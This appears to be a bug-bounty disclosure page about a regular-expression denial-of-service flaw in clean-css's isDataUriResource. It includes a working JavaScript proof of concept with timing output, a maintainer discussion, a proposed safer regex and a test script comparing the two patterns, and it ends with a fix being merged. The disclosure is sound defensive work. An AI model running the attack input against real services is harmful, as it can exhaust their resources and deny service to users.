Inefficient Regular Expression Complexity in clean-css/clean-css


Reported on

Sep 12th 2021

✍️ Description

It allows causing a denial of service when calling the function isDataUriResource.

🕵️‍♂️ Proof of Concept

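// PoC.js
var isDataUriResource = require("clean-css/lib/utils/is-data-uri-resource");

for (var i = 1; i <= 50000; i++) {
   // Start timestamp in milliseconds
   var time = Date.now();
   // No comma anywhere in the input, so the pattern can only fail after backtracking
   var attack_str = 'data:' + ';charset=a;'.repeat(i*10000);
   // Call under test
   isDataUriResource(attack_str);
   var time_cost = Date.now() - time;
   console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}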

💥 The Output

attack_str.length: 110005: 4326 ms
attack_str.length: 220005: 17106 ms
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the clean-css team and are waiting to hear back a year ago
clean-css/clean-css maintainer
a year ago


Hey folks / @admin - this is the clean-css maintainer. I appreciate the security you disclosed, however I want you to comment on a few things:

  • clean-css is quite a popular library, however in 99.9% of cases it's used during a build process, so DoS at that point would result in a longer build process and/or build crash
  • I believe those 0.1% of cases affected are when someone provides CSS optimization as a service (we do but it's still done 100% inside a browser) and this may cause DoS and allow someone to escalate privileges etc

Sure we can do a fix, but there's probably countless other cases where this can happen.

Yeting Li
a year ago


Hi, nice to hear from you. If the CSS optimization is regarded as a service, it is indeed vulnerable to DoS attacks. I am willing to suggest that the maintainers replace the vulnerable regex /^data:(\S*?)?(;charset=[^;]+)?(;[^,]+?)?,(.+)/ with the safe regex /^data:(\S*?)?(;charset=(?:(?!;charset=)[^;])+)?(;[^,]+?)?,(.+)/.
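
A check worth running before adopting a replacement pattern such as the one suggested above, as an added example that is not code from clean-css or from this report: it confirms that the two patterns agree on sample inputs and measures how failed-match time grows on the PoC's input shape. The sample URIs, function names and repetition counts are constructed for illustration.

```javascript
// Added example (not clean-css code): compare the original pattern with the
// proposed replacement for agreement and for how failed-match time scales.
const ORIGINAL = /^data:(\S*?)?(;charset=[^;]+)?(;[^,]+?)?,(.+)/;
const PROPOSED = /^data:(\S*?)?(;charset=(?:(?!;charset=)[^;])+)?(;[^,]+?)?,(.+)/;

// Constructed sample inputs: valid data URIs, near misses and a non-data URL.
const SAMPLES = [
  'data:text/plain,hello',
  'data:text/css;charset=utf-8;base64,YQ==',
  'data:image/png;base64,iVBORw0KGgo=',
  'data:;charset=utf-8,a%20b',
  'data:,x',
  'data:text/plain;charset=a;charset=b,x',
  'data:text/plain',           // no comma: must not match
  'data:text/plain,',          // empty payload: must not match
  'http://example.com/a.png',
];

// Returns the inputs on which the two patterns differ (match result or captures).
function disagreements(a, b, inputs) {
  const show = (re, s) => JSON.stringify(re.exec(s));
  return inputs.filter((s) => show(a, s) !== show(b, s));
}

// Same shape as the PoC input: no comma, so every match attempt must fail.
function pocInput(reps) {
  return 'data:' + ';charset=a;'.repeat(reps);
}

// Milliseconds spent on one failed match against pocInput(reps).
function timeMs(re, reps) {
  const s = pocInput(reps);
  const t0 = process.hrtime.bigint();
  re.test(s);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

// Ratio of match time when the input doubles: about 2 means linear growth,
// about 4 quadratic. Warm-up runs let the engine compile the pattern first.
function growthRatio(re, reps) {
  timeMs(re, 50); timeMs(re, 50);
  return timeMs(re, 2 * reps) / timeMs(re, reps);
}

console.log('disagreements:', disagreements(ORIGINAL, PROPOSED, SAMPLES));
for (const [name, re] of [['original', ORIGINAL], ['proposed', PROPOSED]]) {
  console.log(name, 'growth ratio when input doubles:', growthRatio(re, 1000).toFixed(1));
}
```

In the output above, doubling the input length (110005 to 220005) raised the time from 4326 ms to 17106 ms, a ratio of about 4; a replacement that removes the slowdown should report a ratio near 2 from growthRatio.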

clean-css/clean-css maintainer validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
clean-css/clean-css maintainer confirmed that a fix has been merged on 3721c6 a year ago
The fix bounty has been dropped
is-data-uri-resource.js#L1 has been validated